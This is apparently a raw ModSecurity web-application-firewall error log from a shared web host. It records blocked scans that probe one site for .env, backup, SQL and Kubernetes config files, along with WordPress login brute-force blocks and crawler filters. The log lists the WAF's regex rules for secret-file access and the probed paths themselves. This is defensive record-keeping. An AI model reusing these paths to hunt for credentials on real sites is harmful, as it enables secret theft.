[Tue May 26 19:56:04.469217 2026] [security2:error] [pid 93576:tid 93757] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/web.config"] [unique_id "ahWtfGDRMqfxdEDkoszc8AAAAC0"]
[Tue May 26 19:56:04.806232 2026] [security2:error] [pid 93576:tid 93831] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cache/error.log.bak"] [unique_id "ahWtfGDRMqfxdEDkoszc-gAAAHc"]
[Tue May 26 19:56:05.161931 2026] [security2:error] [pid 93576:tid 93722] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtfGDRMqfxdEDkoszc9gAAAAo"]
[Tue May 26 19:56:05.312955 2026] [security2:error] [pid 93576:tid 93827] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/config/.env"] [unique_id "ahWtfWDRMqfxdEDkoszdBwAAAHM"]
[Tue May 26 19:56:05.353281 2026] [security2:error] [pid 93576:tid 93730] [client 185.191.171.3:41418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWtfWDRMqfxdEDkoszdCAAAABI"]
[Tue May 26 19:56:05.353477 2026] [security2:error] [pid 93576:tid 93730] [client 185.191.171.3:41418] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWtfWDRMqfxdEDkoszdCAAAABI"]
[Tue May 26 19:56:06.162071 2026] [security2:error] [pid 93576:tid 93762] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/3-sequelize/final/.env"] [unique_id "ahWtfmDRMqfxdEDkoszdGQAAADI"]
[Tue May 26 19:56:06.486592 2026] [security2:error] [pid 93868:tid 94207] [remote 132.148.72.88:38602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtfkqK9k_ZUB2Vp25aAwABs2M"]
[Tue May 26 19:56:06.499946 2026] [security2:error] [pid 93576:tid 93725] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/php/settings.bak"] [unique_id "ahWtfmDRMqfxdEDkoszdHQAAAA0"]
[Tue May 26 19:56:06.668193 2026] [security2:error] [pid 93576:tid 93794] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/log.sql"] [unique_id "ahWtfmDRMqfxdEDkoszdHgAAAFI"]
[Tue May 26 19:56:06.805869 2026] [security2:error] [pid 93868:tid 94210] [remote 132.148.72.88:38602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtfkqK9k_ZUB2Vp25aCwABmGU"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:56:07.006186 2026] [security2:error] [pid 93576:tid 93749] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/send.php.bak"] [unique_id "ahWtf2DRMqfxdEDkoszdIgAAACU"]
[Tue May 26 19:56:07.173095 2026] [security2:error] [pid 93576:tid 93810] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/iam/.env"] [unique_id "ahWtf2DRMqfxdEDkoszdJQAAAGI"]
[Tue May 26 19:56:07.584271 2026] [security2:error] [pid 93576:tid 93815] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtf2DRMqfxdEDkoszdJAAAAGc"]
[Tue May 26 19:56:07.887668 2026] [security2:error] [pid 93576:tid 93825] [client 195.226.194.95:44138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.194.226.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWtf2DRMqfxdEDkoszdMAAAAHE"], referer: https://afstpaul.org/wp-admin/admin-ajax.php
[Tue May 26 19:56:08.018180 2026] [security2:error] [pid 93576:tid 93735] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/k8s/configmap.yaml.bak"] [unique_id "ahWtgGDRMqfxdEDkoszdMwAAABc"]
[Tue May 26 19:56:08.186493 2026] [security2:error] [pid 93576:tid 93806] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/json/wp-config.bak"] [unique_id "ahWtgGDRMqfxdEDkoszdNAAAAF4"]
[Tue May 26 19:56:08.354856 2026] [security2:error] [pid 93576:tid 93813] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connect.php.orig"] [unique_id "ahWtgGDRMqfxdEDkoszdNQAAAGU"]
[Tue May 26 19:56:08.690903 2026] [security2:error] [pid 93576:tid 93832] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/en/.env"] [unique_id "ahWtgGDRMqfxdEDkoszdPwAAAHg"]
[Tue May 26 19:56:08.859332 2026] [security2:error] [pid 93576:tid 93736] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/current/.env.bak"] [unique_id "ahWtgGDRMqfxdEDkoszdQAAAABg"]
[Tue May 26 19:56:09.026936 2026] [security2:error] [pid 93576:tid 93816] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/anaconda/.env"] [unique_id "ahWtgWDRMqfxdEDkoszdQQAAAGg"]
[Tue May 26 19:56:09.363592 2026] [security2:error] [pid 93576:tid 93722] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/planetscale/.env"] [unique_id "ahWtgWDRMqfxdEDkoszdRgAAAAo"]
[Tue May 26 19:56:09.531077 2026] [security2:error] [pid 93576:tid 93741] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/bootstrap/cache/.env"] [unique_id "ahWtgWDRMqfxdEDkoszdSQAAAB0"]
[Tue May 26 19:56:09.698748 2026] [security2:error] [pid 93576:tid 93837] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/localhost/.env"] [unique_id "ahWtgWDRMqfxdEDkoszdSgAAAH0"]
[Tue May 26 19:56:09.867077 2026] [security2:error] [pid 93576:tid 93730] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/old/config.bak"] [unique_id "ahWtgWDRMqfxdEDkoszdTQAAABI"]
[Tue May 26 19:56:10.204833 2026] [security2:error] [pid 93576:tid 93759] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/site/.env.bak"] [unique_id "ahWtgmDRMqfxdEDkoszdUAAAAC8"]
[Tue May 26 19:56:10.372925 2026] [security2:error] [pid 93576:tid 93777] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/next.config.js.bak"] [unique_id "ahWtgmDRMqfxdEDkoszdUgAAAEE"]
[Tue May 26 19:56:10.542004 2026] [security2:error] [pid 93576:tid 93802] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.kube/config.copy"] [unique_id "ahWtgmDRMqfxdEDkoszdVQAAAFo"]
[Tue May 26 19:56:10.551582 2026] [security2:error] [pid 93868:tid 94278] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtgkqK9k_ZUB2Vp25aSQAAAaM"]
[Tue May 26 19:56:10.709564 2026] [security2:error] [pid 93576:tid 93746] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/react-app/src/.env"] [unique_id "ahWtgmDRMqfxdEDkoszdVwAAACI"]
[Tue May 26 19:56:12.405592 2026] [security2:error] [pid 93576:tid 93830] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/news-app/api/.env"] [unique_id "ahWthGDRMqfxdEDkoszddwAAAHY"]
[Tue May 26 19:56:12.910225 2026] [security2:error] [pid 93576:tid 93763] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWthGDRMqfxdEDkoszdegAAADM"]
[Tue May 26 19:56:14.124565 2026] [security2:error] [pid 93868:tid 94249] [remote 51.91.98.45:44038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWthUqK9k_ZUB2Vp25ahwABzHk"]
[Tue May 26 19:56:14.382023 2026] [security2:error] [pid 93868:tid 94002] [remote 51.91.98.45:44038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWthkqK9k_ZUB2Vp25ajQAB5wM"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:56:15.052266 2026] [security2:error] [pid 93868:tid 94012] [remote 49.12.3.147:33354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWthkqK9k_ZUB2Vp25amQAB2Qs"]
[Tue May 26 19:56:15.611849 2026] [security2:error] [pid 93868:tid 94354] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/db.bak"] [unique_id "ahWth0qK9k_ZUB2Vp25asgAAAe8"]
[Tue May 26 19:56:15.662781 2026] [security2:error] [pid 93576:tid 93801] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWth2DRMqfxdEDkoszdnAAAAFk"]
[Tue May 26 19:56:15.779770 2026] [security2:error] [pid 93868:tid 94263] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/uptime/.env"] [unique_id "ahWth0qK9k_ZUB2Vp25augAAAZQ"]
[Tue May 26 19:56:16.117719 2026] [security2:error] [pid 93868:tid 94309] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/core/Database/.env"] [unique_id "ahWtiEqK9k_ZUB2Vp25ayAAAAcI"]
[Tue May 26 19:56:16.796805 2026] [security2:error] [pid 93868:tid 94316] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/keys/index.bak"] [unique_id "ahWtiEqK9k_ZUB2Vp25a4wAAAck"]
[Tue May 26 19:56:17.384364 2026] [security2:error] [pid 93868:tid 94385] [client 51.159.154.219:38060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.154.159.51.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWtiUqK9k_ZUB2Vp25a8AAAAg4"]
[Tue May 26 19:56:17.813084 2026] [security2:error] [pid 93868:tid 94280] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/config/readme.bak"] [unique_id "ahWtiUqK9k_ZUB2Vp25a_QAAAaU"]
[Tue May 26 19:56:18.462007 2026] [security2:error] [pid 93576:tid 93762] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtimDRMqfxdEDkoszdvQAAADI"]
[Tue May 26 19:56:18.658239 2026] [security2:error] [pid 93868:tid 94351] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/collab-connect-web-application/server/.env"] [unique_id "ahWtikqK9k_ZUB2Vp25bFwAAAew"]
[Tue May 26 19:56:19.165993 2026] [security2:error] [pid 93868:tid 94320] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:8443/.env"] [unique_id "ahWti0qK9k_ZUB2Vp25bKQAAAc0"]
[Tue May 26 19:56:19.529835 2026] [security2:error] [pid 93868:tid 94333] [client 62.244.225.226:7080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWti0qK9k_ZUB2Vp25bLQAAAdo"]
